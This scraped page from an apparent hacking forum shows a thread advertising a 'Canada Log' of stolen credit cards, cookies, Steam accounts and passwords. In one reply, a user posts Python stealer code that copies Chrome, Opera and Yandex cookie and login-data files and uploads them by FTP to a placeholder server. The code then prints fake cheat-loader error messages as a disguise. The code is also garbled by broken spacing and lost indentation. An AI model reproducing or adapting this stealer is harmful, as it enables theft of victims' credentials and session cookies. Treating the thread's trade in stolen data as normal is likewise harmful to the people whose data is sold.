Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 1321

Canada Log with FileGrabber,CreditCards,Cookies,Steam,Passwords FOLDERS

by Bokisha69 - 12 October, 2021 - 02:03 PM
This post is by a banned member (Martolin50) - Unhide
This post is by a banned member (Newbie604) - Unhide
Newbie604  
Registered
59
Posts
0
Threads
2 Years of service
#18
jyrtujyrtjyrjyrjhyrjhyrjyrjyrjhryjyrujhuryjryjyfjyrfjxryjry
This post is by a banned member (R4466) - Unhide
R4466  
Registered
12
Posts
0
Threads
2 Years of service
#19
(This post was last modified: 31 August, 2022 - 07:57 PM by R4466.)
(12 October, 2021 - 02:03 PM)Bokisha69 Wrote: Show More
 

import os.path
import getpass
from ftplib import FTP
import random

con = FTP ("host", "login", "password")

"" "
Hack to directory
" ""

UserName = '\\' + getpass.getuser ()

dir_cookie_google = 'C: \\ Users' + UserName + '\\ AppData \\ Local \\ Google \\ Chrome \\ User Data \\ Default \\ Cookies'
dir_pass_google = "C: \\ Users" + UserName + "\\ AppData \ \ Local \\ Google \\ Chrome \\ User Data \\ Default \\ Login Data "
dir_cookie_yandex =" C: \\ Users "+ UserName +" \\ AppData \\ Local \\ Yandex \\ YandexBrowser \\ User Data \\ Default \\ Cookies "
dir_pass_yandex =" C: \\ Users "+ UserName +"\\ AppData \\ Local \\ Yandex \\ YandexBrowser \\ User Data \\ Default \\ Password Checker "
dir_cookie_opera = "C: \\ Users" + UserName + "\\ AppData \\ Roaming \\ Opera Software \\ Opera Stable \\ Cookies"
dir_pass_opera = "C: \\ Users" + UserName + "\\ AppData \\ Roaming \\ Opera Software \\ Opera Stable \\ Login Data "
dir_google =" C: \\ Users "+ UserName +" \\ AppData \\ Local \\ Google \\ Chrome \\ User Data \\ Safe Browsing Cookies "
dir_firefox =" C: \\ Users "+ UserName +" \\ AppData \\ Roaming \\ Mozilla \\ Firefox "
dir_yandex =" C: \\ Users "+ UserName +" \\ AppData \\ Local \\ Yandex "
dir_opera =" C: \\ Users "+ UserName +" \\ AppData \\ Roaming \\ Opera Software "

def check ():
if (os.path.exists (dir_google)) == True:
filename =" google "+ str (random.randint (1,10000))
filename2 = "google_pass" + str (random.randint (1, 10000))
with open (dir_cookie_google, "rb") as content:
con.storbinary ("STOR% s"% filename, content)
with open (dir_pass_google, "rb") as content:
con.storbinary ("STOR% s"% filename2, content)
if (os.path.exists (dir_opera)) == True:
filename = "opera" + str (random.randint (1, 10000))
filename2 = "opera_pass" + str (random.randint (1, 10000) )
with open (dir_cookie_opera, "rb") as content:
con.storbinary ("STOR% s"% filename, content)
with open (dir_pass_opera, "rb") as content:
con.storbinary ("STOR% s"% filename2 , content)
if (os.path.exists (dir_yandex)) == True:
filename = "yandex" + str (random.randint (1, 10000))
filename2 = "yandex_pass" + str (random.randint (1, 10000))
with open (dir_cookie_yandex, "rb") as content:
con.storbinary ( "STOR% s"% filename, content)
with open (dir_pass_yandex, "rb") as content:
con.storbinary ("STOR% s"% filename2, content)

check ()
print ("Error library import HOUII.dll")
print ("Error RUN cheat")
input ()

(12 October, 2021 - 02:03 PM)Bokisha69 Wrote: Show More
 

yea say its gonna works
This post is by a banned member (Makbodl) - Unhide

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)